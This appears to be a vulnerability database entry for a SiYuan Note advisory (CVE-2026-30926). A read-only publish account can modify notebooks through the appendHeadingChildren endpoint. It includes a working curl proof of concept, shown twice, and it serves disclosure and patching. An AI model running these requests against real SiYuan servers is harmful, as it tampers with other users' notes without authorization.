GHSA-F9CQ-V43P-V523

Vulnerability from github – Published: 2026-03-09 18:18 – Updated: 2026-03-10 18:39
VLAI?
Summary
SiYuan: Authorization Bypass Allows Low-Privilege Publish User to Modify Notebook Content via /api/block/appendHeadingChildren
Details

Summary

A privilege escalation vulnerability exists in the publish service of SiYuan Note that allows a low-privilege publish account (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint.

The endpoint only requires model.CheckAuth, which accepts RoleReader sessions. Because the endpoint performs a persistent document mutation and does not enforce CheckAdminRole or CheckReadonly, a publish user with read-only privileges can append new blocks to existing documents.

This allows remote authenticated publish users to modify notebook content and compromise the integrity of stored notes.

Details

File: router.go, block.go, block.go, session.go Lines: router.go:245, api/block.go:193-205, model/block.go:688-714, model/session.go:201-209 Vulnerable Code:

- router.go: ginServer.Handle("POST", "/api/block/appendHeadingChildren", model.CheckAuth, appendHeadingChildren)
- api/block.go: model.AppendHeadingChildren(id, childrenDOM)
- model/block.go: indexWriteTreeUpsertQueue(tree) (persists document mutation)
- session.go: CheckAuth accepts RoleReader as authenticated

Why Vulnerable: A low-privilege publish account (RoleReader, read-only) passes CheckAuth, but this write endpoint lacks CheckAdminRole and CheckReadonly. The handler performs persistent document writes.

PoC

  1. Enable publish service and create low-privilege account
curl -u workspace:<ACCESS_AUTH_CODE> \
-H "Content-Type: application/json" \
-d '{
  "enable": true,
  "port": 6808,
  "auth": {
    "enable": true,
    "accounts": [
      {
        "username": "viewer",
        "password": "viewerpass"
      }
    ]
  }
}' \
http://127.0.0.1:6806/api/setting/setPublish
  1. Create a test notebook and document (admin)
curl -u workspace:<ACCESS_AUTH_CODE> \
-H "Content-Type: application/json" \
-d '{"name":"AuditPOC"}' \
http://127.0.0.1:6806/api/notebook/createNotebook

Create a document containing a heading:

curl -u workspace:<ACCESS_AUTH_CODE> \
-H "Content-Type: application/json" \
-d '{
  "notebook":"<NOTEBOOK_ID>",
  "path":"/Victim",
  "markdown":"# VictimHeading\n\nOriginal paragraph"
}' \
http://127.0.0.1:6806/api/filetree/createDocWithMd
  1. Retrieve heading block ID (low-priv publish account)
curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"stmt":"SELECT id,root_id FROM blocks WHERE content='\''VictimHeading'\'' LIMIT 1"}' \
http://127.0.0.1:6808/api/query/sql

Example response:

{
 "id":"20260307093334-05sj7bz",
 "root_id":"20260307093334-vsa6ft0"
}
  1. Generate block DOM
curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"dom":"<p>InjectedByReader</p>"}' \
http://127.0.0.1:6808/api/lute/html2BlockDOM
  1. Append block using the vulnerable endpoint
curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{
"id":"20260307093334-05sj7bz",
"childrenDOM":"<div ...>InjectedByReader</div>"
}' \
http://127.0.0.1:6808/api/block/appendHeadingChildren

Server response:

{"code":0}
  1. Verify unauthorized modification
curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"stmt":"SELECT content FROM blocks WHERE root_id='\''20260307093334-vsa6ft0'\'' ORDER BY sort"}' \
http://127.0.0.1:6808/api/query/sql

Result includes attacker-controlled content:

InjectedByReader

This confirms that the low-privilege publish user successfully modified the document.

Impact

This vulnerability allows any authenticated publish user with read-only privileges (RoleReader) to modify notebook content.

Potential impacts include:

• Unauthorized modification of private notes • Content tampering in published notebooks • Loss of data integrity • Possible chaining with other API endpoints to escalate further privileges

The issue occurs because write operations are protected only by CheckAuth rather than enforcing role-based authorization checks.

Severity ?
7.1 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260304035530-d03ebdec8279"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30926"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-09T18:18:39Z",
    "nvd_published_at": "2026-03-10T07:44:56Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA privilege escalation vulnerability exists in the publish service of SiYuan Note that allows a low-privilege publish account (RoleReader) to modify notebook content via the `/api/block/appendHeadingChildren` API endpoint.\n\nThe endpoint only requires `model.CheckAuth`, which accepts `RoleReader` sessions. Because the endpoint performs a persistent document mutation and does not enforce `CheckAdminRole` or `CheckReadonly`, a publish user with read-only privileges can append new blocks to existing documents.\n\nThis allows remote authenticated publish users to modify notebook content and compromise the integrity of stored notes.\n\n### Details\n\nFile: router.go, block.go, block.go, session.go\nLines: router.go:245, api/block.go:193-205, model/block.go:688-714, model/session.go:201-209\nVulnerable Code:\n```\n- router.go: ginServer.Handle(\"POST\", \"/api/block/appendHeadingChildren\", model.CheckAuth, appendHeadingChildren)\n- api/block.go: model.AppendHeadingChildren(id, childrenDOM)\n- model/block.go: indexWriteTreeUpsertQueue(tree) (persists document mutation)\n- session.go: CheckAuth accepts RoleReader as authenticated\n```\nWhy Vulnerable:\nA low-privilege publish account (RoleReader, read-only) passes CheckAuth, but this write endpoint lacks CheckAdminRole and CheckReadonly. The handler performs persistent document writes.\n\n\n\n### PoC\n\n1. Enable publish service and create low-privilege account\n```\ncurl -u workspace:\u003cACCESS_AUTH_CODE\u003e \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\n  \"enable\": true,\n  \"port\": 6808,\n  \"auth\": {\n    \"enable\": true,\n    \"accounts\": [\n      {\n        \"username\": \"viewer\",\n        \"password\": \"viewerpass\"\n      }\n    ]\n  }\n}\u0027 \\\nhttp://127.0.0.1:6806/api/setting/setPublish\n```\n2. Create a test notebook and document (admin)\n```\ncurl -u workspace:\u003cACCESS_AUTH_CODE\u003e \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\"name\":\"AuditPOC\"}\u0027 \\\nhttp://127.0.0.1:6806/api/notebook/createNotebook\n```\nCreate a document containing a heading:\n```\ncurl -u workspace:\u003cACCESS_AUTH_CODE\u003e \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\n  \"notebook\":\"\u003cNOTEBOOK_ID\u003e\",\n  \"path\":\"/Victim\",\n  \"markdown\":\"# VictimHeading\\n\\nOriginal paragraph\"\n}\u0027 \\\nhttp://127.0.0.1:6806/api/filetree/createDocWithMd\n```\n3. Retrieve heading block ID (low-priv publish account)\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\"stmt\":\"SELECT id,root_id FROM blocks WHERE content=\u0027\\\u0027\u0027VictimHeading\u0027\\\u0027\u0027 LIMIT 1\"}\u0027 \\\nhttp://127.0.0.1:6808/api/query/sql\n```\nExample response:\n```\n{\n \"id\":\"20260307093334-05sj7bz\",\n \"root_id\":\"20260307093334-vsa6ft0\"\n}\n```\n4. Generate block DOM\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\"dom\":\"\u003cp\u003eInjectedByReader\u003c/p\u003e\"}\u0027 \\\nhttp://127.0.0.1:6808/api/lute/html2BlockDOM\n```\n\n5. Append block using the vulnerable endpoint\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\n\"id\":\"20260307093334-05sj7bz\",\n\"childrenDOM\":\"\u003cdiv ...\u003eInjectedByReader\u003c/div\u003e\"\n}\u0027 \\\nhttp://127.0.0.1:6808/api/block/appendHeadingChildren\n```\nServer response:\n```\n{\"code\":0}\n```\n\n6. Verify unauthorized modification\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\"stmt\":\"SELECT content FROM blocks WHERE root_id=\u0027\\\u0027\u002720260307093334-vsa6ft0\u0027\\\u0027\u0027 ORDER BY sort\"}\u0027 \\\nhttp://127.0.0.1:6808/api/query/sql\n```\nResult includes attacker-controlled content:\n```\nInjectedByReader\n```\nThis confirms that the low-privilege publish user successfully modified the document.\n\n### Impact\nThis vulnerability allows any authenticated publish user with read-only privileges (RoleReader) to modify notebook content.\n\nPotential impacts include:\n\n\u2022 Unauthorized modification of private notes\n\u2022 Content tampering in published notebooks\n\u2022 Loss of data integrity\n\u2022 Possible chaining with other API endpoints to escalate further privileges\n\nThe issue occurs because write operations are protected only by CheckAuth rather than enforcing role-based authorization checks.",
  "id": "GHSA-f9cq-v43p-v523",
  "modified": "2026-03-10T18:39:39Z",
  "published": "2026-03-09T18:18:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30926"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan: Authorization Bypass Allows Low-Privilege Publish User to Modify Notebook Content via /api/block/appendHeadingChildren"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.